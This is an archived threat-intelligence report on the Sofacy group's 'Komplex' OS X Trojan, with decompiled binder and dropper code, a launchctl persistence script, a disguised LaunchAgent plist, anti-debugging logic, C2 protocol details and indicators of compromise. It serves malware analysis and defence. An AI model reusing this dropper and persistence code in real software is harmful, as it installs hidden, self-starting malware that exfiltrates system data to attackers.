{ "id": "b8c15d71-c883-44b9-9bb1-1fb50e9b1044", "created_at": "2026-04-06T00:11:52.315922Z", "updated_at": "2026-04-10T03:37:50.20824Z", "deleted_at": null, "sha1_hash": "b3dd903150abd91b08a78feafd8053706f1a890f", "title": "Sofacy’s ‘Komplex’ OS X Trojan", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 820957, "plain_text": "Sofacy’s ‘Komplex’ OS X Trojan\r\nBy Dani Creus, Tyler Halfpop, Robert Falcone\r\nPublished: 2016-09-26 · Archived: 2026-04-05 13:12:19 UTC\r\nUnit 42 researchers identified a new OS X Trojan associated with the Sofacy group that we are now tracking with\r\nthe 'Komplex' tag using the Palo Alto Networks AutoFocus threat intelligence platform.\r\nThe Sofacy group, also known as APT28, Pawn Storm, Fancy Bear, and Sednit, continues to add to the variety of\r\ntools they use in attacks; in this case, targeting individuals in the aerospace industry running the OS X operating\r\nsystem. During our analysis, we determined that Komplex was used in a previous attack campaign targeting\r\nindividuals running OS X that exploited a vulnerability in the MacKeeper antivirus application to deliver\r\nKomplex as a payload. Komplex shares a significant amount of functionality and traits with another tool used by\r\nSofacy - the Carberp variant that Sofacy had used in previous attack campaigns on systems running Windows. In\r\naddition to shared code and functionality, we also discovered Komplex command and control (C2) domains that\r\noverlapped with previously identified phishing campaign infrastructures associated with the Sofacy group.\r\nKomplex Binder\r\nKomplex is a Trojan that the Sofacy group created to compromise individuals using OS X devices. The Trojan has\r\nmultiple parts, first leading with a binder component that is responsible for saving a second payload and a decoy\r\ndocument to the system. We found three different versions of the Komplex binder, one that was created to run on\r\nx86, another on x64, and a third that contained binders for both x86 and x64 architectures. We found the following\r\nsamples of the Komplex binder:\r\n2a06f142d87bd9b66621a30088683d6fcec019ba5cc9e5793e54f8d920ab0134: Mach-O 64-\r\nbit executable x86_64\r\nc1b8fc00d815e777e39f34a520342d1942ebd29695c9453951a988c61875bcd7: Mach-O\r\nexecutable i386\r\ncffa1d9fc336a1ad89af90443b15c98b71e679aeb03b3a68a5e9c3e7ecabc3d4: Mach-O\r\nuniversal binary with 2 architectures\r\nRegardless of architecture, these initial binders all save a second embedded Mach-O file to ‘/tmp/content’. This\r\nfile is the Komplex dropper used in the next stage of installation and to maintain persistence. After saving the\r\nKomplex dropper, these binders would then save a legitimate decoy document to the system and open them using\r\nthe ‘Preview’ application to minimize suspicion of any malicious activity. Figure 1 shows the main function found\r\nhttps://researchcenter.paloaltonetworks.com/2016/09/unit42-sofacys-komplex-os-x-trojan/\r\nPage 1 of 14\n\nin one of the initial droppers that saves and opens a PDF decoy, as well as executes another executable file saved\r\nas ‘/tmp/content’.\r\nhttps://researchcenter.paloaltonetworks.com/2016/09/unit42-sofacys-komplex-os-x-trojan/\r\nPage 2 of 14\n\n1\r\n2\r\n3\r\n4\r\n5\r\n6\r\n7\r\n8\r\n9\r\n10\r\n11\r\n12\r\n13\r\n14\r\n15\r\n16\r\n17\r\n18\r\n19\r\n20\r\n21\r\n22\r\n23\r\n24\r\nint _main(int arg0, int arg1) {\r\n    var_28 = [[NSAutoreleasePool alloc] init];\r\n    var_38 = [NSSearchPathForDirectoriesInDomains(0xf, 0x1, 0x1) objectAtIndex:0x0];\r\n    var_40 = [NSString stringWithFormat:@\"%@/roskosmos_2015-2025.pdf\", var_38];\r\n    var_48 = [NSString stringWithFormat:@\"SetFile -a E %@/roskosmos_2015-2025.pdf\",\r\nvar_38];\r\n    var_50 = [NSString stringWithFormat:@\"rm -rf %@/roskosmos_2015-2025.app\", var_38];\r\n    var_58 = [NSString stringWithFormat:@\"open -a Preview.app %@/roskosmos_2015-\r\n2025.pdf\", var_38];\r\n    [[NSData dataWithBytes:_joiner length:0x20f74] writeToFile:@\"/tmp/content\"\r\natomically:0x1];\r\n    system([var_50 UTF8String]);\r\n    system(\"chmod 755 /tmp/content\");\r\n    [[NSData dataWithBytes:_pdf length:0x182c82] writeToFile:var_40 atomically:0x1];\r\n    system([var_48 UTF8String]);\r\n    var_70 = [[NSTask alloc] init];\r\n    [var_70 setLaunchPath:@\"/tmp/content\"];\r\n    [var_70 launch];\r\n    [var_70 waitUntilExit];\r\n    system([var_58 UTF8String]);\r\n    remove(*arg1);\r\n    [var_28 release];\r\n    return 0x0;\r\n}\r\nFigure 1 Main function within the Komplex binder\r\nhttps://researchcenter.paloaltonetworks.com/2016/09/unit42-sofacys-komplex-os-x-trojan/\r\nPage 3 of 14\n\nThe binder component saves a decoy document named roskosmos_2015-2025.pdf to the system and opens it using\r\nthe Preview application built into OS X. Figure 2 shows a portion of the 17 page decoy document. This document\r\nis titled “Проект Федеральной космической программы России на 2016 - 2025 годы” and describes the\r\nRussian Federal Space Program’s projects between 2016 and 2025. We do not have detailed targeting information\r\nregarding the  Sofacy group's attack campaign delivering Komplex at this time; however, based on the contents of\r\nthe decoy document, we believe that the target is likely associated with the aerospace industry.\r\nFigure 2 Decoy document opened by Komplex binder showing document regarding the Russian Space Program\r\nKomplex Dropper\r\nThe Komplex dropper component is saved to the system as “/tmp/content” (SHA256:\r\n96a19a90caa41406b632a2046f3a39b5579fbf730aca2357f84bf23f2cbc1fd3) and is responsible for installing a\r\nthird executable to the system and setting up persistence for the third executable to launch each time the OS X\r\noperating system starts. This dropper also provided the basis for the name “Komplex”, which is seen in several\r\nfolder paths that were included within the Mach-O file, such as “/Users/kazak/Desktop/Project/komplex\".\r\nThe Komplex dropper is fairly straightforward from a functional perspective, as it contains all of its functionality\r\nwithin its “_main” function. The “_main” function (Figure 3) accesses data within three variables named\r\n‘_Payload_1’, ‘_Payload_2’ and ‘_Payload_3’, and writes them to three files on the system.\r\n1\r\n2\r\nint _main(int arg0, int arg1) {\r\n    var_38 = [[NSAutoreleasePool alloc] init];\r\nhttps://researchcenter.paloaltonetworks.com/2016/09/unit42-sofacys-komplex-os-x-trojan/\r\nPage 4 of 14\n\n3\r\n4\r\n5\r\n6\r\n7\r\n8\r\n9\r\n10\r\n11\r\n12\r\n13\r\n14\r\n15\r\n16\r\n17\r\n18\r\n19\r\n20\r\n21\r\n22\r\n23\r\n24\r\n25\r\n    var_40 = [NSData dataWithBytes:_Payload_1 length:0x15c1c];\r\n    var_48 = [NSData dataWithBytes:_Payload_2 length:0x201];\r\n    var_50 = [NSData dataWithBytes:_Payload_3 length:0x4c];\r\n    system(\"mkdir -p /Users/Shared/.local/ \u0026\u003e /dev/null\");\r\n    system(\"mkdir -p ~/Library/LaunchAgents/ \u0026\u003e /dev/null\");\r\n    [var_40 writeToFile:@\"/Users/Shared/.local/kextd\" atomically:0x1];\r\n    [var_48 writeToFile:@\"/Users/Shared/com.apple.updates.plist\"\r\natomically:0x1];\r\n    [var_50 writeToFile:@\"/Users/Shared/start.sh\" atomically:0x1];\r\n    system(\"cp /Users/Shared/com.apple.updates.plist\r\n$HOME/Library/LaunchAgents/  \u0026\u003e/dev/null\");\r\n    remove(\"/Users/Shared/com.apple.updates.plist\");\r\n    system(\"chmod 755 /Users/Shared/.local/kextd\");\r\n    system(\"chmod 755 /Users/Shared/start.sh\");\r\n    var_58 = [[NSTask alloc] init];\r\n    [var_58 setLaunchPath:@\"/Users/Shared/start.sh\"];\r\n    [var_58 launch];\r\n    [var_58 waitUntilExit];\r\n    remove(\"/Users/Shared/start.sh\");\r\n    remove(*arg1);\r\n    [var_38 release];\r\n    return 0x0;\r\n}\r\nFigure 3 Komplex Dropper's main function that drops three files to the system and runs a shell script\r\nThe “_main” function writes the data within ‘_Payload_1’, ‘_Payload_2’, and ‘_Payload_3’ variables to the\r\nfollowing files, respectively:\r\nhttps://researchcenter.paloaltonetworks.com/2016/09/unit42-sofacys-komplex-os-x-trojan/\r\nPage 5 of 14\n\n1. /Users/Shared/.local/kextd (SHA256:\n227b7fe495ad9951aebf0aae3c317c1ac526cdd255953f111341b0b11be3bbc5)\n2. /Users/Shared/com.apple.updates.plist (SHA256:\n1f22e8f489abff004a3c47210a9642798e1c53efc9d6f333a1072af4b11d71ef)\n3. /Users/Shared/start.sh (SHA256:\nd494e9f885ad2d6a2686424843142ddc680bb5485414023976b4d15e3b6be800)\nThe shell script saved to ‘/Users/Shared/start.sh’ calls the system command ‘launchctl’ to add a plist entry into\n‘launchd’ to automatically execute the Komplex payload each time the system starts. Figure 4 shows the contents\nof the ‘start.sh’ script that sets up persistence for the payload.\n#!/bin/sh\nlaunchctl load -w ~/Library/LaunchAgents/com.apple.updates.plist\nFigure 4 Contents of the start.sh shell script that calls launchctl\nThe ‘start.sh’ script loads ‘com.apple.updates.plist’, which sets the properties of the Komplex payload that is\nexecuted from “/Users/Shared/.local/kextd” at system start up courtesy of the “RunAtLoad” parameter. Figure 5\nshows the contents of the ‘com.apple.updates.plist’ file loaded into ‘launchd’.\n1\n2\n3\n4\n5\n6\n7\n8\n9\n10\n11\n12\n13\n?xml version=\"1.0\" encoding=\"UTF-8\"?\u003e\n\nLabelcom.apple.updatesProgramArguments/Users/Shared/.local/kextdKeepAlive https://researchcenter.paloaltonetworks.com/2016/09/unit42-sofacys-komplex-os-x-trojan/\nPage 6 of 14\n\n14\n15\n16\n17\n18\n19\n20\n21\nRunAtLoadStandardErrorPath/dev/nullStandardOutPath/dev/null Figure 5 Contents of the com.apple.updates.plist file showing how the dropper achieves persistence\nKomplex Payload\nThe ultimate purpose of the aforementioned components is to install and execute the Komplex payload. The\ndropper component saves the payload to \"/Users/Shared/.local/kextd\" (SHA256:\n227b7fe495ad9951aebf0aae3c317c1ac526cdd255953f111341b0b11be3bbc5) and ultimately executes the payload.\nThe payload begins by conducting an anti-debugging check to see if it is being debugged before proceeding with\nexecuting its main functionality, which can be seen in the “AmIBeingDebugged” function in Figure 6. The\n“AmIBeingDebugged” function uses the “sysctl” function to check to see if a specific “P_TRACED” flag is set,\nwhich signifies that the process is being debugged. A particularly interesting part of this function is that it is very\nsimilar to the function provided by Apple to its developers in a guide created in 2004 titled “Detecting the\nDebugger”. This is not the first time the Sofacy group's malware authors have obtained techniques from publicly\navailable sources, as demonstrated in the use of the Office Test Persistence Method that they obtained from a blog\nposted in 2014.\n1\n2\n3\n4\n5\n6\n7\n8\nint AmIBeingDebugged()() {\n var_8 = **__stack_chk_guard;\n getpid();\n if ((((sysctl(0x1, 0x4, var_2A8, 0x288, 0x0, 0x0) == 0x0 ? 0x1 : 0x0) ^ 0x1) \u0026 0x1\n\u0026 0xff) != 0x0) {\n rax = __assert_rtn(\"AmIBeingDebugged\",\n\"/Users/user/Desktop/LoaderWinApi/LoaderWinApi/main.mm\", 0x21, \"junk == 0\");\n }\nhttps://researchcenter.paloaltonetworks.com/2016/09/unit42-sofacys-komplex-os-x-trojan/\nPage 7 of 14\n\n9\r\n10\r\n11\r\n12\r\n13\r\n14\r\n15\r\n16\r\n17\r\n18\r\n19\r\n    else {\r\n            var_2C1 = (0x0 \u0026 0x800) != 0x0 ? 0x1 : 0x0;\r\n            if (**__stack_chk_guard == var_8) {\r\n                    rax = var_2C1 \u0026 0x1 \u0026 0xff;\r\n            }\r\n            else {\r\n                    rax = __stack_chk_fail();\r\n            }\r\n    }\r\n    return rax;\r\n}\r\nFigure 6 The AmIBeingDebugged function used as an anti-analysis technique\r\nAfter determining that it is not running in a debugger, the payload performs an anti-analysis/sandbox check by\r\nissuing a GET request to Google, to check for Internet connectivity. The payload will sleep until it receives a\r\nresponse from the HTTP requests to Google, which means Komplex will only communicate to its C2 servers in\r\nInternet enabled environments. Figure 7 shows the “connectedToInternet” function that confirms whether the\r\npayload is able to communicate with “http://www.google.com” before carrying out its functionality.\r\nint connectedToInternet()() {\r\n    if ([NSData dataWithContentsOfURL:[NSURL\r\nURLWithString:@\"http://www.google.com\"]] != 0x0) {\r\n            var_1 = 0x1;\r\n    }\r\n    else {\r\n            var_1 = 0x0;\r\n    }\r\n    rax = var_1 \u0026 0x1 \u0026 0xff;\r\nhttps://researchcenter.paloaltonetworks.com/2016/09/unit42-sofacys-komplex-os-x-trojan/\r\nPage 8 of 14\n\nreturn rax;\r\n}\r\nFigure 7 The connectedToInternet function testing for an active Internet connection\r\nAfter confirming an active Internet connection, the Komplex payload begins carrying out its main functionality.\r\nThe Komplex payload uses an 11-byte XOR algorithm to decrypt strings used for configuration and within C2\r\ncommunications, including the C2 domains themselves. Figure 8 shows a screenshot of Komplex’s custom string\r\ndecryption algorithm, along with the XOR key used to decrypt strings within the payload.\r\nFigure 8 11-byte XOR algorithm used by Komplex to decrypt configuration strings\r\nThe algorithm seen in Figure 8 decrypts the strings seen in Table 1, which the payload references using the\r\nassociated variable names. The payload uses these decrypted strings for a variety of purposes, such as command\r\nparsing and C2 server locations.\r\nVariable Name Decrypted String\r\nFILE_NAME FileName\r\nPATHTOSAVE PathToSave\r\nSTART_BLOCK_FILE [file]\r\nBLOCK_EXECUTE Execute\r\nBLOCK_DELETE Delete\r\nhttps://researchcenter.paloaltonetworks.com/2016/09/unit42-sofacys-komplex-os-x-trojan/\r\nPage 9 of 14\n\nEND_BLOCK_FILE [/file]\r\nSERVERS appleupdate[.]org, apple-iclouds[.]net, itunes-helper[.]net\r\nMAC mac\r\nCONFIG config\r\nGET_CONFIG 1\r\nFILES file\r\nLOG log\r\nOLD_CONFIG 2\r\nID id\r\nTOKEN h8sn3vq6kl\r\nEXTENSIONS .xml .pdf, .htm, .zip\r\nTable 1 Strings decrypted by Komplex and their referenced name\r\nThe Komplex payload uses the SERVERS variable to obtain the location of its C2, which it communicates with\r\nusing HTTP POST requests. The payload generates a URL to communicate with its C2 server that has the\r\nfollowing structure:\r\n/\u003crandom path\u003e/\u003crandom string\u003e.\u003cchosen extension\u003e/?\u003crandom string\u003e=\u003cencrypted token\u003e\r\nThe \u003cchosen extension\u003e portion of the URL is chosen at random from the list of legitimate file extensions: .xml,\r\n.zip, .htm and .pdf. The \u003cencrypted token\u003e within the parameters of the URL is base64 encoded ciphertext created\r\nfrom the string ‘h8sn3vq6kl’. The ciphertext of the string is generated via a custom algorithm that uses a random\r\n4-byte integer as a key that is modified by XOR with the static value 0xE150722. The payload also encrypts the\r\ndata sent within the POST request using the same algorithm and encodes it using base64. Figure 9 below shows an\r\nexample HTTP POST sent from the payload to its C2 server.\r\nhttps://researchcenter.paloaltonetworks.com/2016/09/unit42-sofacys-komplex-os-x-trojan/\r\nPage 10 of 14\n\nFigure 9 Beacon sent from Komplex to C2 containing system information within the HTTP POST data\r\nThe HTTP POST data in Figure 9 is comprised of information that the malware collects from the infected system.\r\nThe system information sent to the C2 includes data such as the system version, username, and process list, which\r\nis gathered within a function named “getOsInfo” within the “InfoOS” class (Figure 10).\r\nint InfoOS::getOsInfo()() {\r\n    var_38 = rdi;\r\n    var_18 = [[NSProcessInfo processInfo] operatingSystemVersionString];\r\n    var_20 = NSUserName();\r\n    var_28 = InfoOS::getProcessList();\r\n    var_30 = operator new[](strlen(var_28) + 0x200);\r\n    sprintf(var_30, \"Mac OS X - %s %s\\nUser name - %s\\n\\t\\t\\t\\t\\t\\tProcess\r\nlist :\\n\\n%s\", [var_18 UTF8String], InfoOS::bitOS(), [var_20 UTF8String],\r\nvar_28);\r\n    rax = var_30;\r\n    return rax;\r\nhttps://researchcenter.paloaltonetworks.com/2016/09/unit42-sofacys-komplex-os-x-trojan/\r\nPage 11 of 14\n\n}\r\nFigure 10 getOsInfo function within Komplex that gathers system information for C2 beacon\r\nThe Sofacy C2 server will respond to this HTTP request with encrypted data that the payload will decrypt using\r\nthe same custom algorithm used to encrypt the POST data. The Komplex payload will parse the C2 response for\r\nthe following strings: \"[file]\" and \"[/file]\", \"FileName=\", \"PathToSave=\", \"Shell=\", \"Execute\", and \"Delete\". The\r\n\"Delete\" action does nothing more than delete a file specified by 'PathToSave'/'FileName', whereas the \"Execute\"\r\naction involves running the following system commands before executing the specified file:\r\nmkdir -p \u0026lt;'PathToSave'\u0026gt; \u0026amp;\u0026gt; /dev/null\r\nchmod 755 \u0026lt;'PathToSave'\u0026gt;/\u0026lt;'FileName'\u0026gt; \u0026amp;\u0026gt; /dev/null\r\nThe payload will treat \"[file]\" and \"[/file]\" as delimiters that specify the data that the payload should write to a\r\nspecified file, which allows the threat actor to download additional files to the system. Lastly, the payload can\r\nexecute commands on the compromised system specified within the \"Shell\" field, which the payload will execute\r\nand then send results back to the C2.\r\nConnections to Sofacy and Previous Attacks.\r\nCode Overlaps\r\nWhile reverse engineering the Komplex payload, we came across a few code overlaps that we believed were\r\nworth exploring. First, we noticed striking similarities between the Komplex payload and the traits and behavior\r\nof an OS X Trojan discussed in a BAE Systems blog titled NEW MAC OS MALWARE EXPLOITS\r\nMACKEEPER. According to this blog post, an OS X Trojan was delivered via a vulnerability in the MacKeeper\r\napplication. The nameless OS X Trojan uses an 11-byte XOR algorithm to decrypt an embedded configuration,\r\nwhich has all of the same variable names and values as the Komplex sample (see Table 1). The algorithm used to\r\nencrypt and decrypt the network traffic, as well as all static elements of the network communications (composition\r\nof URL, structure of HTTP data, command parsing procedure, etc.) discussed in the blog post are the exact same\r\nas seen in the Komplex payload. These overlaps suggest that the Trojan delivered by the MacKeeper vulnerability\r\nwas in fact the Komplex Trojan.\r\nThe second code overlap ties the Komplex Trojan to Sofacy’s Carberp variant, which we have analyzed in\r\nprevious research efforts. Even though Komplex was created to run on OS X and Sofacy’s Carberp variant was\r\ndeveloped to run on Windows, they share many commonalities, including:\r\nSame URL generation logic using random path values, a random file extension and encrypted token\r\nSame file extensions used in C2 URL that are listed within the binaries in the same order\r\nSame algorithm used to encrypt and decrypt the token in the URL and HTTP POST data (Carberp key is\r\nmodified using value 0xAA7D756 whereas Komplex uses 0xE150722)\r\nhttps://researchcenter.paloaltonetworks.com/2016/09/unit42-sofacys-komplex-os-x-trojan/\r\nPage 12 of 14\n\nVery similar command handling, including parsing specifically for Execute, Delete, [file], [/file],\r\nFileName, and PathToSave.\r\nChecks for Internet connectivity by connecting to google.com\r\nUses an 11-byte XOR key to decrypt strings within the configuration\r\nIn addition to these common traits, we found a Sofacy Carberp variant (SHA256:\r\n638e7ca68643d4b01432f0ecaaa0495b805cc3cccc17a753b0fa511d94a22bdd) using the same TOKEN value of\r\n‘h8sn3vq6kl’ within its C2 URL, as observed in Komplex payloads. Based on these observations, we believe that\r\nthe author of Sofacy’s Carberp variant used the same code, or at least the same design, to create the Komplex\r\nTrojan. A benefit of retaining many of the same functionalities within the Windows and OS X Trojans is that it\r\nwould require fewer alterations to the C2 server application to handle cross-platform implants.\r\nInfrastructure Overlap\r\nWhile Komplex’s C2 domain appleupdate[.]org does not appear to have any previously known activity associated\r\nwith it, both the apple-iclouds[.]net and itunes-helper[.]net domains have direct ties to Sofacy activity. The apple-iclouds[.]net domain is mentioned within a PwC Tactical Intelligence Bulletin that discussed a phishing campaign\r\nconducted by the Sofacy group. The itunes-helper[.]net domain is associated with separate activity discussed in\r\nTrend Micro’s blog titled Looking Into a Cyber-Attack Facilitator in the Netherlands that included research on\r\nhosting providers used by Pawn Storm (Sofacy).\r\nThe domain appleupdate[.]org does have one interesting correlation point, specifically involving the IP\r\n185.10.58[.]170 that resolved this domain between April 2015 through April 2016. Researchers at BAE Systems\r\nprovided Unit 42 the Komplex payload delivered through the exploitation of MacKeeper (Dropper SHA256:\r\nda43d39c749c121e99bba00ce809ca63794df3f704e7ad4077094abde4cf2a73 and Payload SHA256:\r\n45a93e4b9ae5bece0d53a3a9a83186b8975953344d4dfb340e9de0015a247c54), which used the IP address\r\n185.10.58[.]170 within its configuration as a C2 server. This infrastructure overlap further strengthens the\r\nconnection between the Komplex payload we discovered with the prior campaign using MacKeeper for delivery.\r\nConclusion\r\nThe Sofacy group created the Komplex Trojan to use in attack campaigns targeting the OS X operating system – a\r\nmove that showcases their continued evolution toward multi-platform attacks. The tool is capable of downloading\r\nadditional files to the system, executing and deleting files, as well as directly interacting with the system shell.\r\nWhile detailed targeting information is not currently available, we believe Komplex has been used in attacks on\r\nindividuals related to the aerospace industry, as well as attacks leveraging an exploit in MacKeeper to deliver the\r\nTrojan. The Komplex Trojan revealed a design similar to Sofacy’s Carberp variant Trojan, which we believe may\r\nhave been done in order to handle compromised Windows and OS X systems using the same C2 server application\r\nwith relative ease.\r\nWhile Unit 42 continues to research and track this threat, Palo Alto Networks customers are protected via the\r\nfollowing:\r\nWildFire correctly identifies known Komplex executables as malicious\r\nhttps://researchcenter.paloaltonetworks.com/2016/09/unit42-sofacys-komplex-os-x-trojan/\r\nPage 13 of 14\n\nIPS signature #14442 Sofacy.Gen Command And Control Traffic can detect and block outbound C2\r\nrequests generated by the Komplex Trojan.\r\nCustomers can track this Trojan via the Komplex tag in AutoFocus.\r\nIOCs:\r\nHashes:\r\n2a06f142d87bd9b66621a30088683d6fcec019ba5cc9e5793e54f8d920ab0134\r\nc1b8fc00d815e777e39f34a520342d1942ebd29695c9453951a988c61875bcd7\r\ncffa1d9fc336a1ad89af90443b15c98b71e679aeb03b3a68a5e9c3e7ecabc3d4\r\n96a19a90caa41406b632a2046f3a39b5579fbf730aca2357f84bf23f2cbc1fd3\r\n227b7fe495ad9951aebf0aae3c317c1ac526cdd255953f111341b0b11be3bbc5\r\n45a93e4b9ae5bece0d53a3a9a83186b8975953344d4dfb340e9de0015a247c54\r\nC2 Locations:\r\nappleupdate[.]org\r\napple-iclouds[.]net\r\nitunes-helper[.]net\r\n185.10.58.170\r\nSource: https://researchcenter.paloaltonetworks.com/2016/09/unit42-sofacys-komplex-os-x-trojan/\r\nhttps://researchcenter.paloaltonetworks.com/2016/09/unit42-sofacys-komplex-os-x-trojan/\r\nPage 14 of 14", "extraction_quality": 1, "language": "EN", "sources": [ "MITRE" ], "references": [ "https://researchcenter.paloaltonetworks.com/2016/09/unit42-sofacys-komplex-os-x-trojan/" ], "report_names": [ "unit42-sofacys-komplex-os-x-trojan" ], "threat_actors": [ { "id": "730dfa6e-572d-473c-9267-ea1597d1a42b", "created_at": "2023-01-06T13:46:38.389985Z", "updated_at": "2026-04-10T02:00:02.954105Z", "deleted_at": null, "main_name": "APT28", "aliases": [ "Pawn Storm", "ATK5", "Fighting Ursa", "Blue Athena", "TA422", "T-APT-12", "APT-C-20", "UAC-0001", "IRON TWILIGHT", "SIG40", "UAC-0028", "Sofacy", "BlueDelta", "Fancy Bear", "GruesomeLarch", "Group 74", "ITG05", "FROZENLAKE", "Forest Blizzard", "FANCY BEAR", "Sednit", "SNAKEMACKEREL", "Tsar Team", "TG-4127", "STRONTIUM", "Grizzly Steppe", "G0007" ], "source_name": "MISPGALAXY:APT28", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "e3767160-695d-4360-8b2e-d5274db3f7cd", "created_at": "2022-10-25T16:47:55.914348Z", "updated_at": "2026-04-10T02:00:03.610018Z", "deleted_at": null, "main_name": "IRON TWILIGHT", "aliases": [ "APT28 ", "ATK5 ", "Blue Athena ", "BlueDelta ", "FROZENLAKE ", "Fancy Bear ", "Fighting Ursa ", "Forest Blizzard ", "GRAPHITE ", "Group 74 ", "PawnStorm ", "STRONTIUM ", "Sednit ", "Snakemackerel ", "Sofacy ", "TA422 ", "TG-4127 ", "Tsar Team ", "UAC-0001 " ], "source_name": "Secureworks:IRON TWILIGHT", "tools": [ "Downdelph", "EVILTOSS", "SEDUPLOADER", "SHARPFRONT" ], "source_id": "Secureworks", "reports": null }, { "id": "ae320ed7-9a63-42ed-944b-44ada7313495", "created_at": "2022-10-25T15:50:23.671663Z", "updated_at": "2026-04-10T02:00:05.283292Z", "deleted_at": null, "main_name": "APT28", "aliases": [ "APT28", "IRON TWILIGHT", "SNAKEMACKEREL", "Group 74", "Sednit", "Sofacy", "Pawn Storm", "Fancy Bear", "STRONTIUM", "Tsar Team", "Threat Group-4127", "TG-4127", "Forest Blizzard", "FROZENLAKE", "GruesomeLarch" ], "source_name": "MITRE:APT28", "tools": [ "Wevtutil", "certutil", "Forfiles", "DealersChoice", "Mimikatz", "ADVSTORESHELL", "Komplex", "HIDEDRV", "JHUHUGIT", "Koadic", "Winexe", "cipher.exe", "XTunnel", "Drovorub", "CORESHELL", "OLDBAIT", "Downdelph", "XAgentOSX", "USBStealer", "Zebrocy", "reGeorg", "Fysbis", "LoJax" ], "source_id": "MITRE", "reports": null }, { "id": "d2516b8e-e74f-490d-8a15-43ad6763c7ab", "created_at": "2022-10-25T16:07:24.212584Z", "updated_at": "2026-04-10T02:00:04.900038Z", "deleted_at": null, "main_name": "Sofacy", "aliases": [ "APT 28", "ATK 5", "Blue Athena", "BlueDelta", "FROZENLAKE", "Fancy Bear", "Fighting Ursa", "Forest Blizzard", "G0007", "Grey-Cloud", "Grizzly Steppe", "Group 74", "GruesomeLarch", "ITG05", "Iron Twilight", "Operation DealersChoice", "Operation Dear Joohn", "Operation Komplex", "Operation Pawn Storm", "Operation RoundPress", "Operation Russian Doll", "Operation Steal-It", "Pawn Storm", "SIG40", "Sednit", "Snakemackerel", "Sofacy", "Strontium", "T-APT-12", "TA422", "TAG-0700", "TAG-110", "TG-4127", "Tsar Team", "UAC-0028", "UAC-0063" ], "source_name": "ETDA:Sofacy", "tools": [ "ADVSTORESHELL", "AZZY", "Backdoor.SofacyX", "CHERRYSPY", "CORESHELL", "Carberp", "Computrace", "DealersChoice", "Delphacy", "Downdelph", "Downrage", "Drovorub", "EVILTOSS", "Foozer", "GAMEFISH", "GooseEgg", "Graphite", "HATVIBE", "HIDEDRV", "Headlace", "Impacket", "JHUHUGIT", "JKEYSKW", "Koadic", "Komplex", "LOLBAS", "LOLBins", "Living off the Land", "LoJack", "LoJax", "MASEPIE", "Mimikatz", "NETUI", "Nimcy", "OCEANMAP", "OLDBAIT", "PocoDown", "PocoDownloader", "Popr-d30", "ProcDump", "PythocyDbg", "SMBExec", "SOURFACE", "SPLM", "STEELHOOK", "Sasfis", "Sedkit", "Sednit", "Sedreco", "Seduploader", "Shunnael", "SkinnyBoy", "Sofacy", "SofacyCarberp", "SpiderLabs Responder", "Trojan.Shunnael", "Trojan.Sofacy", "USB Stealer", "USBStealer", "VPNFilter", "Win32/USBStealer", "WinIDS", "Winexe", "X-Agent", "X-Tunnel", "XAPS", "XTunnel", "Xagent", "Zebrocy", "Zekapab", "carberplike", "certutil", "certutil.exe", "fysbis", "webhp" ], "source_id": "ETDA", "reports": null } ], "ts_created_at": 1775434312, "ts_updated_at": 1775792270, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/b3dd903150abd91b08a78feafd8053706f1a890f.pdf", "text": "https://archive.orkl.eu/b3dd903150abd91b08a78feafd8053706f1a890f.txt", "img": "https://archive.orkl.eu/b3dd903150abd91b08a78feafd8053706f1a890f.jpg" } }